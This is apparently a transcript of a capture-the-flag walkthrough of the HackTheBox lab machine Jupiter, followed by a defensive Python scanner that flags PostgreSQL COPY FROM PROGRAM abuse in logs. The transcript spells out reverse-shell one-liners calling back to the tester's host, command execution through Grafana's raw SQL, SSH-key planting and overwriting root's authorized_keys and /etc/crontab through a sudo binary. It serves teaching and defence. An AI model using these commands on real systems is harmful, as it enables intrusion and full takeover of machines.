HackTheBox - Jupiter
Key Takeaways
The video walks through the HackTheBox machine Jupiter. Virtual-host enumeration with gobuster finds a Grafana instance whose data-source queries send raw SQL to PostgreSQL; because the database role is a superuser, the COPY ... FROM PROGRAM feature gives command execution and a shell, which is then converted to SSH access. Privilege escalation goes through a world-writable network-simulation YAML file (juno), a Jupyter Notebook token found in a log (jovian), and a sattrack binary runnable with sudo whose config controls where downloaded files are written (root), with a closing look at why dropping a file into /etc/crontab worked where /var/spool/cron/crontabs did not.
Full Transcript
What's going on YouTube, this is IppSec. I'm doing Jupiter from HackTheBox, which starts off with some virtual host enumeration to discover the kiosk subdomain, and once you go there you discover it is running Grafana, and Grafana is hooked up to PostgreSQL. So if you inspect the HTTP request you can see it's just sending raw SQL queries over to Grafana. Some light enumeration also shows it's running as the Grafana admin user, which allows you to execute commands from a SQL query, unlike MySQL or SQLite, which don't have easy ways to execute commands. With a shell on the box you have to do a few different privilege escalations in order to get to root. The first one involves exploiting some network simulation software: you just discover some YAML files, put shellcode in there, or not shellcode but shell commands, and get access to the juno user, which then lets you read some information in order to access a Jupyter notebook, and from there you get a shell as jovian, and there's a binary that you have to do some light exploitation with. So with that being said, let's jump in.

As always we start with an nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it jupiter, and then the IP address of 10.10.11.216. This can take some time to run so I've already run it. Looking at the results we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80 running nginx, and the banner also tells us it's Ubuntu, and then we also have the http-title script telling us that it redirects to jupiter.htb. So let's go ahead and add this to our hosts file, because if we don't then we'll just get an error message saying we can't find the website. So let's go and add 10.10.11.216 jupiter.htb, and we have to open up Firefox (if you don't know what I did there, I just pressed Alt+F2), and we can go to 10.10.11.216 and we see jupiter.htb, and we see planetary observational data.

So it looks like it's some sciencey space-type website. The first thing I notice is all the links point to .html, so we don't know what type of web server this is. Looking through it I don't see that much data. If we look at this image we just see it's image NASA 1; we can try killing this directory to see if open directory listings are on, which may let us see extra images, but I'm not seeing any way for us to send input to this website. We do have a contact form, so let's try this out: root at ... website, hello, and then I'm going to turn Burp Suite on, make sure I am intercepting. We can send the message. It's getting a map from Google; this is another Maps API call, lots of Google Maps. I probably should only intercept what the target is, but we don't actually get anything, and the contact form just has a question mark, so I don't think it actually did anything. So at this point we can either attempt to do a dirbust and try to guess files, or maybe get subdomains. I'm going to start out with just subdomains, because so far I see .html. I guess we could guess like /admin to see if we get into a login form, but we don't even know a login, so how can we guess a password? We don't really have anything. So let's do gobuster, then we can say -h because it's been a while since I did this, vhost, and then let's see, we need -u, so we can say http://jupiter.htb, and then the wordlist /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt.

So if we run this it may give us something. We're at 10%, and I guess while that goes we could try a few directories like /admin, /login, but since everything was HTML I don't know how we'd do a login form, because HTML is for a static site, right? We can look at the page source for this to see exactly how it's built; maybe it's using Hugo or some static site builder. I don't see anything right off the bat of how it's built. Going back here we do find a subdomain of kiosk, so let's go and add that to the hosts file, so vi /etc/hosts, don't forget to sudo, and then we can add kiosk.jupiter.htb, and we see it is Grafana. Typically you see Grafana on internal networks, not external. It's a lot of statistics, observational-type information; I normally see Grafana when it's creating graphs of CPU usage, RAM, all those things, but it has a lot of uses. One of the silly things about Grafana when it's pointed towards a database is it can run raw SQL, because what you're using Grafana for is never meant to be sensitive. So let us examine these, and I'm waiting for a POST request to come: api/dashboard, Prometheus, here we go, we want the api/ds/query, because this does something really silly and we have raw SQL here, and I think this was actually reported as a bug on PostgreSQL. Let me just show this real quick: if we run it we can see the command and then the output of it. This is a bit of a complicated command, so if I just do select 'please subscribe' and then send this request, we see this is our query and then the value is please subscribe. So we do have, maybe it's SQL injection, I don't know exactly what to call this because it's a feature, it's just letting us run SQL; we're not really injecting SQL because we have the full command here, right? We could do select version() and we get the output; we can see it's using PostgreSQL. And this ds I believe stands for data source. Let me see if I can Google this.

One thing I wanted to do real quick, what was it, grafana raw, I think it's raw under_SQL. Let's go over to Google. Yeah, this post is about it, saying it's raw SQL injection if you want to expose it to unauthenticated users. There are some dashboards now, you can create public dashboards that prevent using the raw SQL, but old versions of Grafana, really silly. Fun fact: when this box first got submitted to HackTheBox we had rejected it, because we didn't know this and we said it was unrealistic to do it, but it was actually a feature of Grafana. So yeah, now that we know we are PostgreSQL, what we need to do is probably get a way to execute commands, because as I said Grafana typically just has metrics, there's nothing really sensitive in it, there's no login, there's no credentials; what can we really exfil from this database? Not much. However, since it is PostgreSQL, PostgreSQL does something really silly: PostgreSQL has this COPY command, so if we look at the man page for COPY it will say you can copy the table name from a file or program, and this program lets you run random commands. So this table name is where you copy the output of either of these, the file or the program. So essentially we're just going to use that. The first thing we have to do though is validate that we are a PostgreSQL administrative user, so I'm going to Google HackTricks postgres because I don't remember all these commands off the top of my head; it's always nice to refer back to HackTricks or PayloadsAllTheThings or something like that. So let's see, the first one we want to do is something about setting, I know, so I'm going to Ctrl+F setting, there we go, it's select current_setting('is_superuser'). So let's run this command, paste this in, and we get on. If we were not it would be off. So instead of saying yes/no or true/false, PostgreSQL says on and off, for whatever reason that's how they chose it.

So now that we know we are superuser we can now execute commands, and that is down here. Let's see, I already know it's the COPY command, I may want to just Ctrl+F for that. Let's see, copy, here it is. So they're going to use the table cmd_exec; I'm going to change some of these parameters just to show you it doesn't matter. So at first they're just going to drop the table if it exists, so we can do this, and what I'm going to do is call this table runme. So we dropped the table; now we want to create it, so we know the table doesn't exist, so I can create the table. I'm going to call this runme, and instead of cmd_output we're going to do, I'll call it stdout, just to show that piece doesn't matter. This is text, this is what type of column this is, so text obviously matters here because we're going to put text into this column. So we have now created the table runme, and now we want to run that COPY command, so we're going to do COPY, and this is going to be the table name runme FROM PROGRAM, and we'll leave it as id to see what that is. Okay, and to make things easier on me I'm going to press Ctrl+R to open a new window so I can just do select * from runme, go down here, and we can see the output. Now we could change this to say hostname, and if we don't delete what we did previously it's just going to add another row, so we see the first command was here, which was id, and then we have jupiter. So if you're doing this on an operation, you want to make sure you clean up after yourself, because all the commands you run pretty much are logged, because that's how it works. So let's go back here and we're going to send a reverse shell. I already am using both quotes, a single quote and a double quote, so because I'm doing that I'm going to try playing with the pipe character, because that will let me get away from using other quotes and having to worry about escaping characters. So I'm going to do echo, then we can do bash -i /dev/tcp/10.10.14.8/9001 0>&1 like that, and then let's base64 encode this.

So I have a plus there; I think if I put a space here that gets rid of that plus, and then at the end we have a plus here, oh, two pluses at the end, to get rid of that one. So all I'm doing now is making this completely alphanumeric. I don't think I have to, but whenever I can avoid special characters like equals or plus I like doing it. So we also have to listen on 9001, and let's see, FROM PROGRAM we can say echo this, base64 decode it, then pipe it over to bash, run it. This hangs, which is a good sign because it's waiting for this to finish, which, we have our shell. So now let's do python3 -c 'import pty; pty.spawn("/bin/bash")', okay, Ctrl+C, uh, Ctrl+Z, then stty raw -echo, fg, and now we have a shell, so I can clear my screen. If I do export TERM=xterm, there we go. And what do we want to look at on this machine? We already kind of determined the data in PostgreSQL probably isn't that special. We could go enumerate it but I'm not going to do that. If you wanted to poke in the database I would recommend going to ippsec.rocks, typing postgres, and maybe the Mentor video or Developer; we have plenty of videos on enumerating PostgreSQL, or you can just follow it from HackTricks. So let's see, something killed my python, I think this is an error message, python pty. I guess there's something killing python, so at this point I could use script to get a proper PTY or we can just convert to SSH. I'm going to opt for converting to SSH, so let's get this real quick, export TERM=xterm so I can see this better. So one of the other features of Postgres is often its shell is set to /bin/bash, so since we're the postgres user and our shell is bash we can just drop an SSH key. So let's do mkdir .ssh, go into .ssh, and then we can say ssh-keygen -f, I'm going to call this ipsec. So now we have a key; cat the .pub, grab this, vi authorized_keys, paste, chmod 600, and now ssh -i, put my key which is ipsec, I'll say postgres@jupiter.htb, and that lets us in.

So if something killed our python shell again it doesn't matter, because now we have SSH. So we go into /home, we can see we can't get into any user directory, so at this point I may look for some type of kernel exploit, or also I'd run LinPEAS, but before I do that, always check sudo rules, so sudo -l; we need a password, we don't know it. And then I also like checking what is listening, what ports are open: so port 80, this is going to be the website; 22, SSH; 53 is DNS, so that's going to be systemd-resolved or whatever it is, dnsmasq probably, but not important. So we have 3000, 8888 and PostgreSQL, so let's curl localhost port 3000, see what this is. That is Grafana, and I can just tell because I see grafana-app, so I'm going to ignore that. What was that other port? curl localhost 8888, get nothing; add a -v, it forwards us to /tree?, and that forwards us to some type of login. So let's do an SSH tunnel. I'm going to hit enter, but when I do, the next thing I type is going to be that squiggly C (~C), and that's going to drop me into an SSH prompt which just lets me do a tunnel without closing my SSH session. So we'll forward port 8888 to 127.0.0.1:8888, okay, and now if I do localhost:8888 we get to Jupyter Notebook, so we need either the password or the token, and if we have the token we can just create a new password. So at this point I want to try to find the Jupyter token and I don't know it, so let's do a find / -name '*jupyter*' and pipe errors to /dev/null, see if there's anything it finds. Some python libraries, we got /etc/jupyter, /bin/jupyter, we got jupyter server terminal.json, maybe, nope, nothing there.

In /opt we have this solar-flares thing, we can't access it; the user jovian and members of the science group can. So if I do a cat /etc/group and then grep for science we can see two users, jovian and juno. So let's just search for all the files owned by the user juno, and if this doesn't pop up anything I'll look for jovian, and we have a bunch in /dev/shm. We have shadow.data, so if I go into this we have network-simulation.yml. If I look at it, it looks like YAML; we have processes, path, and it's executing curl, and if I do an ls -la we know juno owns this. So I think most people probably found this through running pspy to look at running processes on the box and eventually seeing network-simulation running, but this is how I found it: I just was looking at directories, looking at owners, and kind of going into the more forensic aspect. pspy definitely works, but you don't really learn that much by just running pspy, saying oh I saw this binary run, let's look at it, right? I like finding it this way better. But yes, that's a long rant for something that doesn't really matter. So let's go and look at this. If I look at shadow.data it is October 18th at around midnight; if I look at the time now it is that time, that exact minute, so this is telling me the shadow.data is being updated every minute. If I look into shadow.data I see this thing, a directory called hosts, which is really interesting because we have this hosts YAML variable there.

So if I go in that we have clients, so if I go to client1 we have curl, error, standard out, just a bunch of curl files. So if I cat that we can see it's doing a curl. So if we look at this file again in /dev/shm, this network-simulation, it is writable by everyone, so what I want to do is see if we can copy a file into juno's directory since he's the owner. So cp, let's grab our SSH key, and then vi network-simulation and the path of this; let's see, which cp, /usr/bin/cp, I don't know if we need absolute paths or not, but since it's used once, might as well. So /dev/shm/authorized_keys, and that'll go to /home/juno/.ssh/authorized_keys. Save it, do ls, let's do a date, 10:12:36.9, and what time is that file? If I do a stat I should be able to see the seconds. So it runs at the top of the minute, so we should see it in about 30 seconds, so I'm just going to speed up the video; we'll come back when the sleep command finishes. Okay, the sleep command has finished. If I do ls -la again we still see 36 on shadow.data. Let's see, maybe it runs every 2 minutes, 36 is an even number, so I'm going to do a sleep 45 and we'll come back when this command is finished. Okay, it is done, ls -la, and we see 38. So now let us try to SSH, so let's do ssh -i the same key we used, juno@10.10.1..., I forget the IP, jupiter.htb, that's easier.

And it's asking for a password, so something failed. Let's go in shadow.data, hosts, client1, so we have client1 cp standard out, nothing there; if we look at standard error, cannot open the key, permission denied. So let's go up three directories, cp, or yeah, chmod 777 authorized_keys, so now everyone can read it, and now, that's rude, it copied the network-simulation back to how it was. So let's do /dev/shm/authorized_keys and then /home/juno/.ssh, and I think we can probably run multiple processes, so after that I'm going to run /usr/bin/chmod, or chown I should say, and we can say juno on that file, and that's not the file I want, /home/juno/authorized_keys, there we go, and let's make it permission 600: chmod 600 /home/juno/.ssh/authorized_keys. File was changed since writing, okay. Did we already drop the key though? We did. So if you didn't notice, when I was doing this I saved the file right after the cp and then started doing these commands, so it doesn't look like you need the chown/chmod command. If we do ls .ssh we can see the permissions are oddly good, but either way we are now juno on this box.

So our goal was to find this token, right, and that was in /opt/solar-flares, or at least we have solar-flares there, and if I look in, probably, logs, we have a lot of Jupyter logs. I'm going to go and grab the latest one and it looks like we have a token. So if I copy this, we put the token in, we can log in to Jupyter Notebook, and this is like a documentation thing that lets you have inline code. I'm going to go straight to their example, and it's not going to work because it's trying to download things, so let's just do a new notebook real quick. But the whole point of it is you can write code and then have these code blocks where you just run it and it gives you the output. I've seen it used a lot; like when I was doing threat hunting we had Jupyter notebooks of various scripts, and we talked about what an IOC was, and then this would run a query that went to Elastic or Splunk and got the results, right? It just makes documentation really fun like that. So let's do a print hello world and I click run and we see it comes back with hello world. So we can do, let's see, import os, then os.system, and let's see, you can run whoami: jovian.

So let's copy /dev/shm/authorized_keys to /home/jovian/.ssh, right, run it. The /home/jovian/.ssh is a directory, so let's make that directory first and then we can copy the key into it, and we should be able to SSH to that directory now. So let's do ssh -i ipsec jovian@10.10.11, I think it's 216; why do I keep defaulting to the IP address instead of the hostname? But now we're jovian. I do want to say I had trouble with this. I think if we did http://127.0.0.1:8888, is this going to work still? Let's see, the token was on this page, put it in, let's do a new notebook, it's loading, print hello world, run, okay it is. I'm not sure what error I ran into when I was doing this box before, but it was kind of hung here and I had closed my browser, reopened it using actually a SOCKS proxy instead of this local port forward, and then it worked. But I think I had just screwed up my browser cookies or something and it couldn't authenticate, so ignore that, but if you do have troubles, clear your browser cache because that piece can be a little finicky. So now that we are jovian on this box we can do the same thing: find / -user jovian, pipe errors to /dev/null, see what's special about this guy. We can ignore anything in /sys, /run; the home directory has quite a bit, but this is all python stuff, probably for Jupyter. We got /proc, and what's after /proc? Let's see, let's just do grep -v home, proc, sys, run, and we can get rid of /opt as well, and there's nothing. If we do sudo -l we can see we can run this binary, /usr/local/bin/sattrack. So let's try running this, so I'll do sudo the binary and we see configuration file has not been found. So let's do find / -name like this to /dev/null and we see the binary is at /usr/local/bin, but there is a directory probably here at /usr/local/share. If I go in /usr/local/share it's got config.json, earth.png, map.json.

So we have to figure out how to get sattrack to load a configuration file. Let's see, if I do /usr/local/share/sattrack/config.json, not found. Do we have strace? We do, so it's looking for /tmp/config.json. We could have copied the binary and opened it up in Ghidra locally, but dynamic analysis is always faster, so we probably should just copy the config to /tmp. So let's do cp /usr/local/share/sattrack to /tmp, then we can run it; looks like we didn't need sudo. And let's see, the tleroot does not exist, creating it, and then it's doing a GET on that domain. So let's look at what the config looks like, so edit /tmp/config.json, we see tleroot, so it created this directory, and then we have a tlefile weather.txt and tlesources. I'm not exactly sure what TLE means. Let's just point this to our box, so I'm going to do 10.10.14.8:8000/test, save this, mkdir www, echo please subscribe to test, and now let's start up a web server and we can run sattrack again. We see it download test, and if we go in that /tmp, what was it, tle directory, we have test there; there's also weather.txt which is empty. So whatever it downloads it does save. So with that logic, and since we can run it with sudo, we should be able to edit this tleroot to be, let's see, /root/.ssh, and we can just download, I called my key ipsec, so we want to rename the key to authorized_keys like that, and we can cp our key to authorized_keys and then sudo sattrack, make this, it did a GET to download it. So let's do ssh -i, oh yikes, I just made a mistake, my authorized key is a private key, so cp ipsec.pub to authorized_keys and let's run this again and hopefully it will overwrite, because we could have just clobbered that authorized key file. So specify the key, root@jupiter.htb, and we're root.

Let's go in .ssh, vi authorized_keys, so it looks like it replaces the file, it doesn't, yeah, it just replaces it, so that's good. If it didn't replace the file then we would have seen the private key here as well. And if this .ssh didn't exist, I bet we could do it through /var/spool/cron/crontabs since we are root. I haven't actually tested this so let's try it out: /var/spool/cron/crontabs, we'll do crontabs/root, let's try this. So if I copy this big JSON, paste this; we could also just do /etc/crontab, right, but I don't want to choose /etc/crontab because /etc/crontab definitely has things in it, and we just said it's going to wipe the file and put it in instead of appending it. So if we had just gone with /etc/crontab right off the bat and they had a bunch of crons here that ran as root, it would screw things up. There's less likely of a chance, I think, of the /var/spool crontab being used. We could potentially, let's see, cat /etc/passwd, we could probably take the bin user and do something fun with that, but let's just do root. So let's go www, vi root, 1 2 3 4 5 and we can say bash -c 'bash -i /dev/tcp/10.10.14.8/9001 0>&1' like that, and specify root here, and we take root off this because it just wants a directory for this. Okay, moment of truth, python3 -m http.server, downloaded it, we run date, we should have a shell in, let's see, we'll do 30 seconds and I'll resume the video when this finishes, and you'll be with me the moment we get the shell, hopefully. I didn't want to just cat the crontab file because maybe that would reload the crontab; I just wanted to leave it as vanilla as possible. Okay, the sleep is done, in probably five, four, three, two, one, and we don't get a shell. Not sure the cron actually reloaded when we copied that file. Let's go /var/spool/cron/crontabs, there is one for root and that is running; if we cat juno, 1 2 3 4 5, so I'm guessing the cron didn't actually reload, so this crontab never ran that way. Let's see, /var/log, is there a cron? No.

There's probably messages, is it syslog? grep -i cron. So it didn't run because the chmod is screwed up, so that is why we couldn't just drop it in there. So if I go /var/spool/cron/crontabs we can see root is not 600, so it failed to update cron. That sucks. Let's see, I wonder if /etc/crontab has that same behaviour, because /etc/crontab has those permissions. One, two, three, so to put it here we'll just need to specify the username after this. So if I was on this and I had a shell on the box and I wanted to run this, I would probably copy /etc/crontab to /tmp to back it up, and then we would go in, edit root, we can say root like this, move root to be crontab, host the server, edit the config, and we just want to put the directory in /etc, and now we can specify crontab, sudo. So now we have loaded the cron. So if I go /var/log and we do that same grep command, let's see, that's insecure mode, so it ran this once, no mail transfer agent installed so it doesn't try to mail it. It doesn't say reloading cron, but we also don't have an error, so hopefully in 10 seconds, or 8 seconds now, we get a shell, and we should definitely listen on a port. Okay, I did not miss it, so there we go. So /etc/crontab works but /var/spool crontab does not, and I didn't know that behaviour difference before doing this video, so now you know too. If you found that interesting definitely let me know in the comments. Hope you guys enjoyed the video, take care, and I'll see you all next time.
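A defender's view of the PostgreSQL step from the video, as an added example that is not code from the video or the box: the video notes that every COPY ... FROM PROGRAM statement is logged, so this script scans constructed sample statement-log lines and flags the is_superuser check, COPY FROM PROGRAM and server-side COPY FROM file, then groups hits by backend pid so the hands-on sequence (privilege check, then program execution) stands out from a legitimate import job. It assumes log_statement = 'all' and a log_line_prefix of '%m [%p] %u@%d '; the role and database names are made up.

```python
"""Flag PostgreSQL statement-log entries matching the COPY FROM PROGRAM
technique from the video (added example, not code from the video or the box).

Assumes statement logging (log_statement = 'all') with log_line_prefix set to
'%m [%p] %u@%d ', so each line carries timestamp, backend pid, role and database.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$"
)

# Most severe first; the first matching rule decides.
RULES = [
    ("high", "COPY ... FROM PROGRAM: OS command run as the database server user",
     re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I)),
    ("medium", "COPY ... FROM 'file': server-side file read",
     re.compile(r"\bCOPY\b.*\bFROM\s+'", re.I)),
    ("medium", "server file-system access function",
     re.compile(r"\bpg_(read_file|read_binary_file|ls_dir)\s*\(", re.I)),
    ("low", "privilege reconnaissance (is_superuser / pg_roles)",
     re.compile(r"current_setting\s*\(\s*'is_superuser'\s*\)|\bpg_roles\b", re.I)),
]

# Constructed sample log: pid 1234 is the sequence from the video (is_superuser
# check, scratch table, COPY FROM PROGRAM); pid 1300 is a legitimate import job.
SAMPLE_LOG = """\
2023-10-18 00:01:02.101 UTC [1234] grafana@appdb LOG:  statement: SELECT version();
2023-10-18 00:01:05.204 UTC [1234] grafana@appdb LOG:  statement: select current_setting('is_superuser');
2023-10-18 00:01:40.311 UTC [1234] grafana@appdb LOG:  statement: DROP TABLE IF EXISTS runme;
2023-10-18 00:01:41.019 UTC [1234] grafana@appdb NOTICE:  table "runme" does not exist, skipping
2023-10-18 00:01:52.420 UTC [1234] grafana@appdb LOG:  statement: CREATE TABLE runme(stdout text);
2023-10-18 00:02:03.533 UTC [1234] grafana@appdb LOG:  statement: COPY runme FROM PROGRAM 'id';
2023-10-18 00:02:10.640 UTC [1234] grafana@appdb LOG:  statement: SELECT * FROM runme;
2023-10-18 00:02:31.757 UTC [1234] grafana@appdb LOG:  statement: copy runme from program 'hostname';
2023-10-18 00:03:00.001 UTC [1300] etl@appdb LOG:  statement: COPY observations TO STDOUT;
2023-10-18 00:03:00.250 UTC [1300] etl@appdb LOG:  statement: COPY observations FROM '/var/lib/postgresql/import/obs.csv' CSV;
2023-10-18 00:03:01.002 UTC [1300] etl@appdb LOG:  statement: SELECT count(*) FROM observations;
"""


def parse_line(line):
    """Return the fields of one statement-log line, or None for any other line."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(sql):
    """Return (severity, reason) for a statement, or None if it is not suspicious."""
    for severity, reason, rx in RULES:
        if rx.search(sql):
            return severity, reason
    return None


def scan(log_text):
    """One finding per suspicious statement, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # NOTICE/ERROR/DETAIL lines carry no statement text
        hit = classify(rec["sql"])
        if hit:
            findings.append({**rec, "severity": hit[0], "reason": hit[1]})
    return findings


def sessions_running_programs(findings):
    """Group findings by backend pid and keep sessions that ran a program.

    recon_first is True when the session's first suspicious statement was a
    privilege check, which is the hands-on pattern shown in the video."""
    by_pid = defaultdict(list)
    for f in findings:
        by_pid[f["pid"]].append(f)
    sessions = {}
    for pid, fs in by_pid.items():
        programs = [f["sql"] for f in fs if f["severity"] == "high"]
        if programs:
            sessions[pid] = {"user": fs[0]["user"], "db": fs[0]["db"],
                             "recon_first": fs[0]["severity"] == "low",
                             "programs": programs}
    return sessions


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"[{f['severity']:6}] pid={f['pid']} {f['user']}@{f['db']}: {f['sql']}")
    for pid, s in sessions_running_programs(found).items():
        print(f"session {pid}: {s['user']} ran {len(s['programs'])} program(s); "
              f"recon first: {s['recon_first']}")
```

The same scan applied to a real log also shows which role Grafana connects as; a data-source role that is a superuser (or holds pg_execute_server_program) is the root cause the video exploits, and the fix is a read-only role for that data source.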
Original Description
00:00 - Introduction
03:40 - Using gobuster to enum
05:45 - Discovering Raw SQL in the HTTP Request, doing some enumeration to discover it is PostgreSQL
08:00 - Looking at the PostgreSQL Copy command, which allows for running commands, getting a shell
12:45 - Got a shell as the PostgreSQL user
15:08 - Got a SSH Shell as the PostgreSQL user, then finding port 8888 and enumerating that port
17:00 - Discovered a Jupyter Notebook, using find to discover what users are doing on the box and seeing Juno has network-simulation.yml
18:45 - Putting a shell on Network-Simulation.yml and getting a shell as juno
23:45 - Shell as Juno, looking for jupyter files and discovering the token, which enables us to login to Jupyter notebooks and get a shell as
28:45 - Jovian can run sattrack as root (via sudo), running strace to discover that it reads the config from /tmp
31:30 - Editing the sattrack config to download an authorized_keys file to root's .ssh directory
33:15 - Pretending /root/.ssh didn't exist, getting a shell through cron